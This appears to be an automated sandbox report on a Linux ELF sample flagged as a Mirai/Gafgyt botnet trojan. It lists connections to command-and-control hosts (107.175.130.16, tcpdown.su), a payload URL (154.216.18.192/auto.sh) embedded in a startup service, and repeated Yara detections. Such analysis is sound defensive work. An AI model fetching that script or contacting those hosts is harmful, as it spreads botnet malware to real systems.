Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.130.16

Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.su

Source: startup_command.service.13.dr	String found in binary or memory: http://154.216.18.192/auto.sh
Source: i586.elf, startup_command.service.13.dr	String found in binary or memory: http://154.216.18.192/auto.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: i586.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
